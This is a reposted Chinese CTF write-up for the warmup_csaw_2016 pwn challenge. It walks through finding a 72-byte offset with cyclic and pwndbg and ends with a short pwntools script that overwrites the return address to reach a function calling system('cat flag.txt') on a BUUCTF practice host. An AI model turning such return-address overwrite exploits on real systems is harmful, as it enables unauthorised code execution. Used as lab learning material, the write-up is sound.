首页 > 其他 > 详细

Pwn-warmup_csaw_2016 writeup

时间:2020-01-16 16:30:37      阅读:295      评论:0      收藏:0      [点我收藏+]
 

本题利用了较为基础的一个栈溢出来获取系统权限

首先我们打开IDA进行分析,搜索字符串我们可以看到有cat flag.txt的关键字样

技术分享图片

 

进入跟踪,我们可以看到,程序调用了system命令

技术分享图片

 

首先我们用cyclic创建一个200字符的字符串,利用它来判断溢出点到返回地址的偏移

技术分享图片

 

 启动Pwndbg进行调试

技术分享图片

 

 由图可得,根据小端序,‘saaa‘之前有多少个字符,就是偏移量

技术分享图片

 

 写出脚本

from pwn import*
p=remote(node3.buuoj.cn,29184)#根据靶机不同来进行更改
addr=0x40060d
payload=a*72+p64(addr)
p.sendline(payload)
p.interactive()

 打通服务器,拿到flag

技术分享图片

Pwn-warmup_csaw_2016 writeup

原文:https://www.cnblogs.com/Virus-Faker/p/12201746.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!